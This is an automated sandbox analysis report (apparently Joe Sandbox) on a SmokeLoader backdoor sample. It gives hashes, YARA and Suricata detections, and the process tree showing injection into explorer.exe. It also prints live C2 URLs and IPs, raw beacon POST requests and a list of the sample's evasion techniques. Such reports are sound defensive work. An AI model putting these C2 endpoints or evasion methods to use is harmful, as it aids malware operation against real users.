Edit tour

Windows Analysis Report
PSyWSlhDa5.exe

Overview

General Information

Sample name:	PSyWSlhDa5.exe renamed because original name is a hash value
Original sample name:	ddea2e8fdf71f225d8edebe0034e589f.exe
Analysis ID:	1537115
MD5:	ddea2e8fdf71f225d8edebe0034e589f
SHA1:	b8c92917f1fe79d3595c7cdcd4c157eae69c7ba6
SHA256:	5e76223b4ec53240790dbdb1a2937774f48094711ee0cf2a5906ffd8e727e519
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

PSyWSlhDa5.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\PSyWSlhDa5.exe" MD5: DDEA2E8FDF71F225D8EDEBE0034E589F)

explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

jhfrihr (PID: 7348 cmdline: C:\Users\user\AppData\Roaming\jhfrihr MD5: DDEA2E8FDF71F225D8EDEBE0034E589F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://tnc-corp.ru/tmp/index.php", "http://volisc.biz/tmp/index.php", "http://livbev.online/tmp/index.php", "http://liverds.at/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.1370701625.0000000000761000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.1370701625.0000000000761000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000006.00000002.1370528428.0000000000630000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.1370528428.0000000000630000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000002.1590943156.00000000004E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.1370451305.00000000005F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x11b76:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000B.00000002.1591172725.0000000000681000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000002.1591172725.0000000000681000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000002.1590986972.00000000004F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000002.1590986972.00000000004F0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000006.00000002.1370487735.0000000000620000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000B.00000002.1591052783.00000000005E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x11b76:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\jhfrihr, CommandLine: C:\Users\user\AppData\Roaming\jhfrihr, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jhfrihr, NewProcessName: C:\Users\user\AppData\Roaming\jhfrihr, OriginalFileName: C:\Users\user\AppData\Roaming\jhfrihr, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user\AppData\Roaming\jhfrihr, ProcessId: 7348, ProcessName: jhfrihr

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-18T15:22:29.763458+0200	2039103	1	A Network Trojan was detected	192.168.2.7	49804	58.151.148.90	80	TCP
2024-10-18T15:23:49.602607+0200	2039103	1	A Network Trojan was detected	192.168.2.7	54553	58.151.148.90	80	TCP
2024-10-18T15:24:05.510238+0200	2039103	1	A Network Trojan was detected	192.168.2.7	54554	58.151.148.90	80	TCP
2024-10-18T15:24:26.406018+0200	2039103	1	A Network Trojan was detected	192.168.2.7	54555	58.151.148.90	80	TCP
2024-10-18T15:24:45.117791+0200	2039103	1	A Network Trojan was detected	192.168.2.7	54556	58.151.148.90	80	TCP
2024-10-18T15:25:01.399322+0200	2039103	1	A Network Trojan was detected	192.168.2.7	54558	197.164.156.210	80	TCP
2024-10-18T15:25:20.884779+0200	2039103	1	A Network Trojan was detected	192.168.2.7	54559	197.164.156.210	80	TCP
2024-10-18T15:25:41.854946+0200	2039103	1	A Network Trojan was detected	192.168.2.7	54560	197.164.156.210	80	TCP
2024-10-18T15:25:59.817784+0200	2039103	1	A Network Trojan was detected	192.168.2.7	54561	197.164.156.210	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PSyWSlhDa5.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\jhfrihr

Avira: detection malicious, Label: HEUR/AGEN.1306958

Found malware configuration

Source: 00000006.00000002.1370528428.0000000000630000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://tnc-corp.ru/tmp/index.php", "http://volisc.biz/tmp/index.php", "http://livbev.online/tmp/index.php", "http://liverds.at/tmp/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\jhfrihr

ReversingLabs: Detection: 40%

Multi AV Scanner detection for submitted file

Source: PSyWSlhDa5.exe

ReversingLabs: Detection: 40%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\jhfrihr

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PSyWSlhDa5.exe

Joe Sandbox ML: detected

Source: PSyWSlhDa5.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49804 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:54554 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:54553 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:54555 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:54561 -> 197.164.156.210:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:54560 -> 197.164.156.210:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:54556 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:54559 -> 197.164.156.210:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:54558 -> 197.164.156.210:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 58.151.148.90 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 197.164.156.210 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://tnc-corp.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://volisc.biz/tmp/index.php
Source: Malware configuration extractor	URLs: http://livbev.online/tmp/index.php
Source: Malware configuration extractor	URLs: http://liverds.at/tmp/index.php

Source: Joe Sandbox View

IP Address: 58.151.148.90 58.151.148.90

Source: Joe Sandbox View	ASN Name: LINKdotNET-ASEG LINKdotNET-ASEG
Source: Joe Sandbox View	ASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR

Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lmdcyyfuyaxd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: tnc-corp.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qlmsuslstturema.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: tnc-corp.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fqucichlworiej.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: tnc-corp.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bucfhfnwdxdsnul.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: tnc-corp.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bkiiefwcdfdnawk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: tnc-corp.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://opseijdvwwpn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: tnc-corp.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tggkhnieyacfcou.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: tnc-corp.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fcnnxutqeonf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: tnc-corp.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kihrnkgidfarppr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: tnc-corp.ru

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: tnc-corp.ru
Source: global traffic	DNS traffic detected: DNS query: volisc.biz
Source: global traffic	DNS traffic detected: DNS query: livbev.online
Source: global traffic	DNS traffic detected: DNS query: liverds.at

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmdcyyfuyaxd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: tnc-corp.ru

Source: explorer.exe, 00000009.00000000.1347657847.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1345524698.0000000007306000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000009.00000000.1347657847.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1345524698.0000000007306000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000009.00000000.1347657847.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1345524698.0000000007306000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000009.00000000.1347657847.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1345524698.0000000007306000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000009.00000000.1346635432.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1347347298.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1347362473.0000000008820000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000009.00000000.1345524698.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 00000009.00000000.1347657847.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000009.00000000.1347657847.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000000.1347657847.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000000.1347657847.0000000008DA6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000000.1347657847.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.1345524698.0000000007276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 00000009.00000000.1347657847.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000009.00000000.1349722962.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000009.00000000.1349722962.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000009.00000000.1349722962.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000000.1347657847.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000009.00000000.1349722962.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000009.00000000.1345524698.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000006.00000002.1370701625.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1370528428.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1591172725.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1590986972.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000006.00000002.1370701625.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.1370528428.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.1590943156.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
